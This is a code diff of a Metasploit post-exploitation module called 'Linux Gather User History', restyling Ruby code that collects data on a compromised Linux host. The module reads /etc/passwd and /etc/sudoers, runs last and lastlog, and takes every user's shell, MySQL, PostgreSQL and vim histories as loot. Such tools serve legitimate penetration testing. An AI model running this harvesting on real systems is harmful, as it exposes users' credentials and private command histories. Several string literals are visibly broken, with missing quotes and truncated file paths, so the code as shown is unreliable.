@@ -11,89 +11,85 @@ class Metasploit3 < Msf::Post
1111 include Msf ::Post ::File
1212 include Msf ::Post ::Linux ::System
1313
14-
15- def initialize ( info = { } )
16- super ( update_info ( info ,
17- 'Name' => 'Linux Gather User History' ,
18- 'Description' => %q{
14+ def initialize ( info = { } )
15+ super ( update_info ( info ,
16+ 'Name' => 'Linux Gather User History' ,
17+ 'Description' => %q{
1918 This module gathers user specific information.
2019 User list, bash history, mysql history, vim history,
2120 lastlog and sudoers.
2221 } ,
23- 'License' => MSF_LICENSE ,
24- 'Author' =>
22+ 'License' => MSF_LICENSE ,
23+ 'Author' =>
2524 [
2625 # based largely on get_bash_history function by Stephen Haywood
2726 'ohdae <bindshell[at]live.com>'
2827 ] ,
29- 'Platform' => [ 'linux' ] ,
30- 'SessionTypes' => [ 'shell' , 'meterpreter' ]
28+ 'Platform' => [ 'linux' ] ,
29+ 'SessionTypes' => [ 'shell' , 'meterpreter' ]
3130 ) )
32-
3331 end
3432
3533 def run
3634 distro = get_sysinfo
3735
38- print_good ( " Info:" )
36+ print_good ( ' Info:' )
3937 print_good ( "\t #{ distro [ :version ] } )
4038 print_good ( "\t #{ distro [ :kernel ] } )
4139
42- users = execute ( " /bin/cat /etc/passwd | cut -d : -f 1" )
43- user = execute ( " /usr/bin/whoami" )
40+ users = execute ( ' /bin/cat /etc/passwd | cut -d : -f 1' )
41+ user = execute ( ' /usr/bin/whoami' )
4442
45- mount = execute ( " /bin/mount -l" )
46- shells = [ ' ash' , ' bash' , ' csh' , ' ksh' , 'sh' , ' tcsh' , ' zsh' ]
43+ mount = execute ( ' /bin/mount -l' )
44+ shells = %w{ ash bash csh ksh sh tcsh zsh }
4745 shells . each do |shell |
4846 get_shell_history ( users , user , shell )
4947 end
5048 get_mysql_history ( users , user )
5149 get_psql_history ( users , user )
5250 get_vim_history ( users , user )
53- last = execute ( " /usr/bin/last && /usr/bin/lastlog" )
54- sudoers = cat_file ( " /etc/sudoers" )
51+ last = execute ( ' /usr/bin/last && /usr/bin/lastlog' )
52+ sudoers = cat_file ( ' /etc/sudoers' )
5553
56- save ( " Last logs" , last ) unless last . blank?
57- save ( " Sudoers" , sudoers ) unless sudoers . blank? || sudoers =~ /Permission denied/
54+ save ( ' Last logs' , last ) unless last . blank?
55+ save ( ' Sudoers' , sudoers ) unless sudoers . blank? || sudoers =~ /Permission denied/
5856 end
5957
60- def save ( msg , data , ctype = " text/plain" )
61- ltype = " linux.enum.users"
58+ def save ( msg , data , ctype = ' text/plain' )
59+ ltype = ' linux.enum.users'
6260 loot = store_loot ( ltype , ctype , session , data , nil , msg )
6361 print_status ( "#{ msg } #{ loot . to_s } )
6462 end
6563
6664 def get_host
6765 case session . type
6866 when /meterpreter/
69- host = sysinfo [ " Computer" ]
67+ host = sysinfo [ ' Computer' ]
7068 when /shell/
71- host = session . shell_command_token ( " hostname" ) . chomp
69+ host = session . shell_command_token ( ' hostname' ) . chomp
7270 end
73-
7471 print_status ( "Running module against #{ host } )
75-
76- return host
72+ host
7773 end
7874
7975 def execute ( cmd )
8076 vprint_status ( "Execute: #{ cmd } )
8177 output = cmd_exec ( cmd )
82- return output
78+ output
8379 end
8480
8581 def cat_file ( filename )
8682 vprint_status ( "Download: #{ filename } )
8783 output = read_file ( filename )
88- return output
84+ output
8985 end
9086
9187 def get_shell_history ( users , user , shell )
9288 return if shell . nil?
93- if user == " root" and users != nil
94- users = users . chomp . split ( )
89+ if user == ' root' && ! users . nil?
90+ users = users . chomp . split
9591 users . each do |u |
96- if u == " root"
92+ if u == ' root'
9793 vprint_status ( "Extracting #{ shell } #{ u } )
9894 hist = cat_file ( "/root/.#{ shell } )
9995 else
@@ -111,12 +107,12 @@ def get_shell_history(users, user, shell)
111107 end
112108
113109 def get_mysql_history ( users , user )
114- if user == " root" and users != nil
115- users = users . chomp . split ( )
110+ if user == ' root' && ! users . nil?
111+ users = users . chomp . split
116112 users . each do |u |
117- if u == " root"
113+ if u == ' root'
118114 vprint_status ( "Extracting MySQL history for #{ u } )
119- sql_hist = cat_file ( " /root/.mysql_history" )
115+ sql_hist = cat_file ( ' /root/.mysql_history' )
120116 else
121117 vprint_status ( "Extracting MySQL history for #{ u } )
122118 sql_hist = cat_file ( "/home/#{ u } )
@@ -132,12 +128,12 @@ def get_mysql_history(users, user)
132128 end
133129
134130 def get_psql_history ( users , user )
135- if user == " root" and users != nil
136- users = users . chomp . split ( )
131+ if user == ' root' && ! users . nil?
132+ users = users . chomp . split
137133 users . each do |u |
138- if u == " root"
134+ if u == ' root'
139135 vprint_status ( "Extracting PostgreSQL history for #{ u } )
140- sql_hist = cat_file ( " /root/.psql_history" )
136+ sql_hist = cat_file ( ' /root/.psql_history' )
141137 else
142138 vprint_status ( "Extracting PostgreSQL history for #{ u } )
143139 sql_hist = cat_file ( "/home/#{ u } )
@@ -153,17 +149,16 @@ def get_psql_history(users, user)
153149 end
154150
155151 def get_vim_history ( users , user )
156- if user == " root" and users != nil
152+ if user == ' root' && ! users . nil?
157153 users = users . chomp . split
158154 users . each do |u |
159- if u == " root"
155+ if u == ' root'
160156 vprint_status ( "Extracting VIM history for #{ u } )
161- vim_hist = cat_file ( " /root/.viminfo" )
157+ vim_hist = cat_file ( ' /root/.viminfo' )
162158 else
163159 vprint_status ( "Extracting VIM history for #{ u } )
164160 vim_hist = cat_file ( "/home/#{ u } )
165161 end
166-
167162 save ( "VIM History for #{ u } , vim_hist ) unless vim_hist . blank? || vim_hist =~ /No such file or directory/
168163 end
169164 else
0 commit comments